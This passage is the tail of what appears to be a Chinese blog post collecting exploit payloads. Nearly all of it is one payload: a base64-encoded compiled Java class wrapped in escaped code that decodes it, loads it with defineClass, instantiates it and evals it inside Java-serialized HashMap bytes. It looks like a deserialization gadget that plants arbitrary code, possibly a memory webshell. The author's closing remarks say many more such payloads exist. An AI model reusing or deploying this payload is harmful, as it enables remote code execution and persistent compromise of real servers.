RISMQS9ABxZAxIsU7YALRkSBL0AHlkDGRBTtgAfOgkZDrYABBIuBL0AHFkDGRJTtgAdGQ4EvQAeWQMZCVO2AB9X pwAOpwAFOgiEBgGn/aexAAcAoACrAK4AEgDOANwA3wASAcQCMAIzAC8APwBEAoUALwBHAGIChQAvAGUAhQKFAC8 AiAJ/AoUALwABAJoAAADeADcAAAAXAAQAGAALABkAFQAaABoAGwAmAB0APwAfAEcAIABOACEAZQAiAHAAIwB1AC QAfQAlAIgAJgCTACcAmAAoAKAAKgCrAC0ArgArALAALADBAC4AxgAvAM4AMQDcADQA3wAyAOEAMwDsADUA8QA2A PkANwEEADgBCQA5ARcAOgEzADsBPgA8AUMAPQFLAD4BZAA/AYoAQAGPAEEBkgBDAZ0ARAHEAEYBzABHAdMASAIO AEkCMABOAjMASgI1AEsCPQBMAl0ATQJ/AE8CggBTAoUAUQKHAB0CjQBVAJsAAAAEAAEALwABAJwAnQADAJkAAAA 5AAIAAwAAABEruAAysE24AAK2ADQrtgA1sAABAAAABAAFADMAAQCaAAAADgADAAAAXwAFAGAABgBhAJsAAAAEAA EAMwCeAAAAAgCfAAEAoAChAAEAmQAAAP8ABAAEAAAAmyvGAAwSNiu2ADeZAAYSOLArtgA5TCsSOrYAO5kAOyort wA8Ej22AD5NLL4FnwAGEj+wKiwDMrUAQCosBDK4AEG4ACe1AEK7AENZKrcARE4ttgBFEkawKxJHtgA7mQAiKiu3 ADwSPbYAPk0svgWfAAYSSLAqLAMyLAQytgBJsCsSSrYAO5kADSoqK7cAPLYAS7AqKiu3ADy2AEuwAAAAAQCaAAA AUgAUAAAAawANAGwAEABuABUAbwAeAHEAKQByAC8AcwAyAHUAOQB2AEYAdwBPAHgAUwB5AFYAegBfAHsAagB8AH AAfQBzAH8AfgCAAIcAgQCRAIMAAQCiAKMAAQCZAAAAdgADAAUAAAA2uwBMWSu3AE1OuwBOWS23AE86BBkELLgAU LYAURkEtgBSGQS2AFOnAAs6BBkEtgBUsC22AFWwAAEACQAmACkALwABAJoAAAAmAAkAAACOAAkAkAATAJEAHACS ACEAkwAmAJYAKQCUACsAlQAxAJcAAgCkAKEAAQCZAAAALwADAAIAAAAXKxI6Eja2AFYSShI2tgBWEkcSNrYAVrA AAAABAJoAAAAGAAEAAACgAAEApQChAAEAmQAAAcMABAAJAAABJxJXuABYtgBZTSu2ADlMAU4sElq2AAyZAEArEl u2AAyZACArEly2AAyaABe7AF1ZtwBeK7YAXxJgtgBftgBhTAa9ACFZAxIiU1kEEmJTWQUrUzoEpwA9KxJbtgAMm QAgKxJctgAMmgAXuwBdWbcAXiu2AF8SY7YAX7YAYUwGvQAhWQMSZFNZBBJlU1kFK1M6BLgAZhkEtgBnTrsAaFkt tgBptwBqEmu2AGw6BRkFtgBtmQALGQW2AG6nAAUSNjoGuwBoWS22AG+3AGoSa7YAbDoFuwBdWbcAXhkGtgBfGQW 2AG2ZAAsZBbYAbqcABRI2tgBftgBhOgYZBjoHLcYABy22AHAZB7A6BRkFtgBUOgYtxgAHLbYAcBkGsDoILcYABy 22AHAZCL8ABACQAPsBBgAvAJAA+wEaAAABBgEPARoAAAEaARwBGgAAAAEAmgAAAGoAGgAAAKkACQCqAA4AqwAQA K0AGQCuACsArwA/ALEAVgCzAGgAtAB8ALYAkAC5AJkAugCrALsAvwC8ANEAvQD3AL4A+wDCAP8AwwEDAL4BBgC/ AQgAwAEPAMIBEwDDARcAwAEaAMIBIADDAAEApgCnAAEAmQAAAXIABAAMAAAA4hJXuABYtgBZElq2AAyaAAkScU6 nAAYSck64AGYttgBzOgS7AHRZKxy3AHU6BRkEtgBpOgYZBLYAbzoHGQW2AHY6CBkEtgB3OgkZBbYAeDoKGQW2AH maAGAZBrYAep4AEBkKGQa2AHu2AHyn/+4ZB7YAep4AEBkKGQe2AHu2AHyn/+4ZCLYAep4AEBkJGQi2AHu2AHyn/ +4ZCrYAfRkJtgB9FAB+uACAGQS2AIFXpwAIOgun/54ZBLYAcBkFtgCCpwAgTrsAXVm3AF4Sg7YAXy22AIS2AF8S hbYAX7YAYbAShrAAAgCnAK0AsAAvAAAAvwDCAC8AAQCaAAAAbgAbAAAA0QAQANIAFgDUABkA1gAiANcALQDYAEI A2QBQANoAWADbAGAA3ABtAN4AdQDfAIIA4QCKAOIAlwDkAJwA5QChAOYApwDoAK0A6QCwAOoAsgDrALUA7QC6AO 4AvwDxAMIA7wDDAPAA3wDyAAEAqACYAAEAmQAAAC0AAwABAAAAESoqtABAKrQAQrYAh7YAiFexAAAAAQCaAAAAC gACAAAA9wAQAPgACQCpAKoAAQCZAAABHAAGAAQAAACsAUwSibgAMk0sEooEvQAcWQMSIVO2AB0stgAqBL0AHlkD KlO2AB/AACzAACxMpwAETSvHAEMSi7gAMhKMA70AHLYAHQEDvQAetgAfTSy2AAQSjQS9ABxZAxIhU7YAHSwEvQA eWQMqU7YAH8AALMAALEynAARNK8cANBKOuAAyTSwSjQS9ABxZAxIhU7YAHU4tLLYAKgS9AB5ZAypTtgAfwAAswA AsTKcABE0rsAADAAIALQAwAC8ANQBxAHQALwB5AKYAqQAvAAEAmgAAAEYAEQAAAQAAAgECAAgBAwAtAQYAMAEEA DEBBwA1AQkATAEKAHEBDQB0AQsAdQEPAHkBEQB/ARIAjwETAKYBFgCpARQAqgEYAAEAqwAAAAIArA==\";\x0ac lz = defineClass\x28base64DecodeToByte\x28code\x29\x29;clz.newInstance\x28\x29;t\x00\x04eval uq\x00~\x00\x1b\x00\x00\x00\x01q\x00~\x00#sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\x c3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp? @\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}
好了好了,兄弟们,实在是不想写下去了,熬不住了就算是ctrl+c ctrl+v也是很累了,其实我总结了还有很多,这些只是冰山一角。
阅读原文:原文链接
该文章在 2025/4/24 16:58:03 编辑过
400 186 1886
